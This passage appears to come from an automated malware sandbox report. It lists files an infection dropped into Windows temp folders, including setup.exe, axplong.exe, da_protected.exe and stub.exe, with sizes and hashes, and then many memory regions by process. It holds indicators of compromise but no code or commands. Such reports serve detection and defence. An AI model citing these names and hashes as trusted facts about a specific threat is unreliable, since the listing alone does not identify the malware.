                                                                                                                                                              dbef4cd72a4a34f4adf0ea61fa817b234cdb9dda090642909003b99c26a586bcb18c9174e337c826e5aa9281874039c8c8e7f39cc8cf6729f10181054394221f

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup.exe

                                                                                                                                                              Filesize

                                                                                                                                                              34.4MB

                                                                                                                                                              MD5

                                                                                                                                                              f9ca0843558c95c441aa9b2f00ed57a6

                                                                                                                                                              SHA1

                                                                                                                                                              a71486409c55062fe65ff5f2a6cfc52cf0c45027

                                                                                                                                                              SHA256

                                                                                                                                                              7095c024a647f825dd9899e2447a73a586d08d5c0bd1001eb2aec86d6cf12183

                                                                                                                                                              SHA512

                                                                                                                                                              696f1557d4bcd7de7fa0bc3f579d55ca6dd4897927cd517290cc89d1f4ef24270202970757a93af5754a6e7b55f89776a65fdc08f8f1cbaa845730c61ebf39c4

                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KJSVJZ729JPOLK5I7YD1.temp

                                                                                                                                                              Filesize

                                                                                                                                                              7KB

                                                                                                                                                              MD5

                                                                                                                                                              a6eab3240d09aa317952cff3146a8f82

                                                                                                                                                              SHA1

                                                                                                                                                              0e1ec9f5b2645af92059b25716b045be0dc79fee

                                                                                                                                                              SHA256

                                                                                                                                                              7e6c295bd608c795493e3382ca38ceb01af17fa395b501d7e8de54d82625fc75

                                                                                                                                                              SHA512

                                                                                                                                                              c7da4cb6278c724a4508b5d171f11bfec27a0257fbbc313a6f78a600aef691e1bb05b40d84d7b257d3afb04f37a0276c18b308021ca20844b0b4102d6797c845

                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\7zS94D0.tmp\Install.exe

                                                                                                                                                              Filesize

                                                                                                                                                              6.4MB

                                                                                                                                                              MD5

                                                                                                                                                              3b5c255b48c65016f33c66e6c0bd0637

                                                                                                                                                              SHA1

                                                                                                                                                              1c721c760f1975c2d055a1a1de4fa5910c5439ab

                                                                                                                                                              SHA256

                                                                                                                                                              9a3b68fd4cbc5c4b2566ab682cf3df2f72661b4808e3e9bb0bfe564218d55cf5

                                                                                                                                                              SHA512

                                                                                                                                                              654b42cae4dcbc7a456f19aa0074d335e7ac469b2deaa06f4f54fabbb0a7e2f3f393da2a14e362d31062f21175da801fc7adf23895dd2125be27548094fd3294

                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\7zS9859.tmp\Install.exe

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                              MD5

                                                                                                                                                              6d62f544d3de937435c07ca2e4c45751

                                                                                                                                                              SHA1

                                                                                                                                                              dd4653f37aa30f1896f84f1b99f850f0487a3e1d

                                                                                                                                                              SHA256

                                                                                                                                                              32a68fcef6732b985c31755e25d5410ebf23e61d1197114c3c74eba0ab2e2075

                                                                                                                                                              SHA512

                                                                                                                                                              eaddce56d9ba57cdd99caaa4041eb4c31b93f2c3a657fb7897deb3f45bb984fcf3d0b658772ab2265f6a27fbc5680ff9a1facf1a351b16608c8f8eb58f94cefb

                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\8254624243\axplong.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.8MB

                                                                                                                                                              MD5

                                                                                                                                                              d405f5cfa352b7bc7fc151c189e691a3

                                                                                                                                                              SHA1

                                                                                                                                                              0379a493153871773ac7bcf6b072b65e89623948

                                                                                                                                                              SHA256

                                                                                                                                                              3bb992b1519a83ed99725ee87607f874c7554303b9979f5e91651a1f3788e91b

                                                                                                                                                              SHA512

                                                                                                                                                              6f753693387c689dff3160ac8c34949f7b89c9475cb1548cf86738eb764723cb46851ed167403058491be882102651b0640efb185c5d5992862e06e1998e3cfc

                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\da_protected.exe

                                                                                                                                                              Filesize

                                                                                                                                                              3.2MB

                                                                                                                                                              MD5

                                                                                                                                                              3d21c714fbb98a6a3c72919928c9525c

                                                                                                                                                              SHA1

                                                                                                                                                              bf628293920b8f0418de008acc8f3506eaeff3cb

                                                                                                                                                              SHA256

                                                                                                                                                              811be420db2f390e60a291018126a8aa45c8c5182c050b13076c80d3f80d153c

                                                                                                                                                              SHA512

                                                                                                                                                              3b21fda899cf197a740dd4f2844c99c772a16ffe20581fe78e801c193f29714fbfa23843059ee34baf6176e71434f0ed7506d75de91b87348bcf9cc4b999575a

                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\onefile_2588_133633641902220000\stub.exe

                                                                                                                                                              Filesize

                                                                                                                                                              17.9MB

                                                                                                                                                              MD5

                                                                                                                                                              972d9d2422f1a71bed840709024302f8

                                                                                                                                                              SHA1

                                                                                                                                                              e52170710e3c413ae3cfa45fcdecf19db4aa382c

                                                                                                                                                              SHA256

                                                                                                                                                              1c666df4eafab03ecde809ffbc40dd60b8ac2fe7bdca5632c5c4002254e6e564

                                                                                                                                                              SHA512

                                                                                                                                                              3d84252756dcb4820b7794e9a92811d32631b9f3e9bd1a558fd040736b1472c0d00efb6ff7a13ae3bcd327f3bfac2b6ad94a5a3dfbc8ba54511a366c4f4727a6

                                                                                                                                                            • memory/324-672-0x000000001B520000-0x000000001B802000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              2.9MB

                                                                                                                                                            • memory/324-673-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              32KB

                                                                                                                                                            • memory/1032-139-0x0000000003FA0000-0x00000000048F8000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.3MB

                                                                                                                                                            • memory/1032-142-0x0000000003FA0000-0x00000000048F8000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.3MB

                                                                                                                                                            • memory/1032-140-0x0000000003FA0000-0x00000000048F8000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.3MB

                                                                                                                                                            • memory/1032-138-0x0000000003FA0000-0x00000000048F8000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.3MB

                                                                                                                                                            • memory/1216-5-0x0000000000080000-0x000000000053C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/1216-2-0x0000000000081000-0x00000000000AF000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              184KB

                                                                                                                                                            • memory/1216-3-0x0000000000080000-0x000000000053C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/1216-15-0x0000000000080000-0x000000000053C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/1216-16-0x0000000006A00000-0x0000000006EBC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/1216-1-0x0000000077750000-0x0000000077752000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/1216-0-0x0000000000080000-0x000000000053C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/1640-196-0x000000013F0F0000-0x0000000140325000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              18.2MB

                                                                                                                                                            • memory/1644-289-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-249-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-241-0x0000000004A80000-0x0000000004B6C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              944KB

                                                                                                                                                            • memory/1644-242-0x0000000000600000-0x000000000061C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              112KB

                                                                                                                                                            • memory/1644-303-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-301-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-299-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-297-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-295-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-293-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-291-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-195-0x00000000012A0000-0x000000000163C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              3.6MB

                                                                                                                                                            • memory/1644-287-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-285-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-283-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-281-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-279-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-277-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-275-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-273-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-271-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-269-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-267-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-265-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-263-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-261-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-259-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-257-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-255-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-253-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-251-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1644-232-0x0000000001190000-0x0000000001296000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.0MB

                                                                                                                                                            • memory/1644-248-0x0000000000600000-0x0000000000615000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              84KB

                                                                                                                                                            • memory/1672-106-0x0000000000020000-0x0000000000021000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/1776-70-0x0000000000C60000-0x0000000000CB0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              320KB

                                                                                                                                                            • memory/1796-625-0x0000000000D60000-0x000000000140F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                            • memory/1796-626-0x0000000001410000-0x0000000001ABF000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                            • memory/1796-410-0x0000000001410000-0x0000000001ABF000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                            • memory/1796-412-0x0000000001410000-0x0000000001ABF000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                            • memory/1796-411-0x0000000001410000-0x0000000001ABF000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                            • memory/1796-409-0x0000000000D60000-0x000000000140F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                            • memory/1804-160-0x0000000001150000-0x0000000001AA8000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.3MB

                                                                                                                                                            • memory/1804-351-0x0000000001150000-0x0000000001AA8000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.3MB

                                                                                                                                                            • memory/1804-353-0x0000000001150000-0x0000000001AA8000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.3MB

                                                                                                                                                            • memory/1804-522-0x0000000001150000-0x0000000001AA8000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.3MB

                                                                                                                                                            • memory/2224-659-0x0000000002410000-0x0000000002418000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              32KB

                                                                                                                                                            • memory/2224-658-0x000000001B620000-0x000000001B902000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              2.9MB

                                                                                                                                                            • memory/2500-408-0x00000000023C0000-0x0000000002A6F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                            • memory/2500-624-0x00000000023C0000-0x0000000002A6F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                            • memory/2588-179-0x000000013FED0000-0x00000001409A5000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              10.8MB

                                                                                                                                                            • memory/2588-231-0x000000013FED0000-0x00000001409A5000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              10.8MB

                                                                                                                                                            • memory/2676-141-0x0000000000390000-0x000000000084C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/2676-21-0x0000000000390000-0x000000000084C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/2676-19-0x0000000000390000-0x000000000084C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/2676-89-0x0000000000390000-0x000000000084C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/2676-331-0x0000000000390000-0x000000000084C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/2676-178-0x0000000000390000-0x000000000084C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/2676-180-0x0000000000390000-0x000000000084C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/2676-18-0x0000000000391000-0x00000000003BF000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              184KB

                                                                                                                                                            • memory/2676-17-0x0000000000390000-0x000000000084C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/2708-620-0x0000000004920000-0x0000000004DDC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB

                                                                                                                                                            • memory/2708-370-0x0000000004920000-0x0000000004DDC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.7MB